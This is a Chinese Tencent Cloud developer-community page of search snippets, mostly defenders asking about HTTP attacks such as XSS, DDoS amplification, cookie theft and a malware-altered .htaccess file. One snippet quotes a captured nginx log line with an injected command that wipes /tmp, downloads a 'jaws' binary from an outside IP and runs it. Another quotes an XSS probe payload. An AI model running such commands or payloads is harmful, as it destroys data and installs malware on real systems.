腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
CSP是否仅适用于HTTPS (TLS)?
如果站点使用
HTTP
而不是HTTPS,那么包含内容安全策略有用吗?一个对手能不能把它移除呢?
浏览 0
提问于2021-11-23
得票数 4
回答已采纳
2
回答
Cookie是否在HTTPS连接中被标记为安全?
、
、
、
、
我的问题是,如果我以HTTPS连接托管我的网站,那么该cookie是否仍然可能
被
攻击
者窃取,以便在中间
攻击
中执行man??那么HTTPS连接中是否还存在这种风险呢?或者如何使其更安全,使
攻击
者不能窃取cookie?
浏览 3
提问于2021-08-23
得票数 0
1
回答
Dos
攻击
的无限重定向
、
我想知道无限重定向可以
被
用作dos
攻击
。 如果我像
http
://mysite.com/test.php?url=
http
://mysite.com/test.php?url=
http
://mysite.com/test.php?url=
http
://mysite.com/test.php?这会导致dos
攻击
吗?
浏览 0
提问于2019-08-02
得票数 1
2
回答
SMTP服务器使用
HTTP
吗?
、
、
、
我正在阅读如何检测到格式错误的数据包,它说
HTTP
洪流
攻击
对SMTP服务器的
攻击
可以
被
过滤。 有人能向我解释一下SMTP和
HTTP
是如何分开的吗?我以为SMTP会以某种方式使用
HTTP
。
浏览 2
提问于2017-05-09
得票数 3
1
回答
关于DDoS
攻击
和放大
、
、
正如您可能听说过的,最近的许多DDoS
攻击
使用不同的放大方法来放大
攻击
的威力。例如,DNS放大是建立在DNS服务器可以为非常小的输入数据包生成巨大的输出数据包的思想之上的。那么,在
HTTP
上也是可能的吗?
HTTP
GET包非常小,而来自服务器的响应包含所请求页面上的所有HTML代码(当然,响应要大得多)。因此,为了放大,
攻击
者可以伪造他的IP地址,并发送许多
HTTP
请求。然后,
HTTP
响应将被发送到欺骗的IP地址。那么,
HTTP
是否
被
浏览 5
提问于2014-04-19
得票数 0
1
回答
我是否认为< href></a>是危险的混合被动内容?
、
来自莫兹拉📷 (src属性)
浏览 0
提问于2021-02-21
得票数 1
回答已采纳
1
回答
使用浏览器缓存的跨站点
攻击
(是否有效?)
、
、
、
、
攻击
方案:
被
攻击
的站点使用cookies (但没有Vary: Cookie
HTTP
头)发出请求,浏览器缓存响应,
攻击
站点发出相同的请求(但没有cookies,因为使用了Set-Cookie中的SameSite(__dirname + '/index.html'); console.log(`Example app listening at
http
://localh
浏览 4
提问于2020-07-14
得票数 2
1
回答
为什么从nginx请求shell命令?
、
cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws
HTTP
/1.1" 301 169 "-" "Hello, world" 93.157.62.102- - "GET /
HTTP
/1.1" 301 169 "
http
://[IP OF MY SERVER]:80/left.html" &qu
浏览 0
提问于2020-07-09
得票数 4
2
回答
计数来自
被
阻塞IP的请求
、
我的服务器上的站点正受到SQL注入的
攻击
。我阻止
被
命令
攻击
的IP:我现在可以回顾一下ATTACK-IP-ADDRESS的活动了吗?我的意思是什么时候和什么
HTTP
请求是从这个IP。
浏览 0
提问于2020-06-26
得票数 -1
2
回答
XSS0类
攻击
的ModSecurity防护及其影响
、
基于DOM(类型0)的XSS不需要向服务器发送恶意代码,因此它们也可以使用静态HTML页面作为
攻击
载体。以下是虚拟
攻击
字符串的示例:我很熟悉,ModSecurity在PDF中提供了对
被
认为是0类
攻击
的XSS
攻击
的保护,但是我的问题是,ModSecurity是否在一般情况下防止这种类
浏览 0
提问于2010-12-10
得票数 3
2
回答
Python -向Internet协议发送请求
、
、
、
嗯,我最近
被
DoS
攻击
了,我需要了解一些事情。s.send("Some sort of packet that would request the server to do 'work'")
浏览 7
提问于2014-10-13
得票数 0
2
回答
cloudflare
被
攻击
了吗?
这是我唯一能想到去的地方,所以我去了我的一个使用Cloudflare的服务器/网站,它没有工作,所以我想问这个社区的可爱的人们发生了什么事
浏览 7
提问于2022-06-21
得票数 -4
回答已采纳
1
回答
Google报告dkim传递无效主机
这有可能是使用未更改的消息重播“
攻击
”吗?
浏览 0
提问于2016-04-19
得票数 0
回答已采纳
1
回答
是否存在从
HTTP
到HTTPS发出CORS请求的安全性问题?
、
、
如果使用
HTTP
的可信网站向HTTPS端点发出CORS请求,我是否应该担心? 提前感谢你的帮助。
浏览 3
提问于2016-09-08
得票数 1
回答已采纳
2
回答
Xss跨站点脚本在实践中的应用
、
、
我知道xss
攻击
使用页面的输入点将javascript代码插入到页面或服务器db中。在这两种情况下,javascript代码将很快或稍后在某些事件上
被
激活。我想象一个
攻击
者使用浏览器使用输入名将javascript代码放入服务器db。另一个客户端(受害者)向同一台服务器发出请求,可能请求用户分类。
攻击
者处于分类状态,因此
攻击
者名称(实际上是邪恶的javascript代码)
被
插入到受害者请求的页面中。我想
攻击</em
浏览 0
提问于2015-03-27
得票数 1
回答已采纳
1
回答
PHP :发布到SSL -澄清?
、
、
可能是很基本的问题,但在读了类似的问题和答案后,我有点困惑,所以希望能有更多的澄清。示例: method=“post”> .....
浏览 0
提问于2017-10-09
得票数 1
4
回答
理解
HTTP
攻击
请求
、
、
我捕捉到了一些网络
攻击
。我试图了解每个
攻击
请求的目的是什么。 GET /site/public/timing?<sVg/OnLOaD=prompt(14721850.00307)>
浏览 0
提问于2016-08-29
得票数 26
1
回答
HTTP
参数污染
攻击
、
、
、
、
反射(HPP)是一个注入弱点漏洞,
攻击
者可以插入分隔符并更改应用程序生成的参数。
攻击
的后果取决于应用程序的功能,但可能包括访问和潜在地利用不可控制的变量,进行其他
攻击
,如跨站点请求伪造,或以意外的方式更改应用程序行为。
浏览 2
提问于2016-06-15
得票数 0
1
回答
这些由恶意软件添加的重写规则在.htaccess中意味着什么?
、
、
、
我的网站最近受到了恶意软件感染的
攻击
。在添加的几个php文件中,我的.htaccess也
被
修改了。通常,它只写index options,但
攻击
者将其更改为如下:RewriteRule ^6334437290/(.*)$ dita-cymbal.php [QSA,-dRewriteCond %{
HTTP
_REFERER} (goog
浏览 5
提问于2017-01-29
得票数 0
回答已采纳
1
回答
阻止
HTTP
POST
攻击
、
、
、
我的服务器受到
HTTP
POST
攻击
,我希望将所有这些请求发送到403,而不是让它们
被
mod_security捕获,以便提高拒绝速度并减轻Apache的一些负担。下面是我现在正在使用的:RewriteCond %{
HTTP
_HOST} !^
http
://(www\.)?
浏览 4
提问于2012-08-03
得票数 1
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
http代理攻击威胁分析
防止Web攻击,做好HTTP安全标头
如何使用海外爬虫HTTP代理避免被限制?
你被重放攻击了吗?
CC攻击是什么?如何防止网站被CC攻击?
热门
标签
更多标签
云服务器
ICP备案
腾讯会议
对象存储
云直播
活动推荐
运营活动
广告
关闭
领券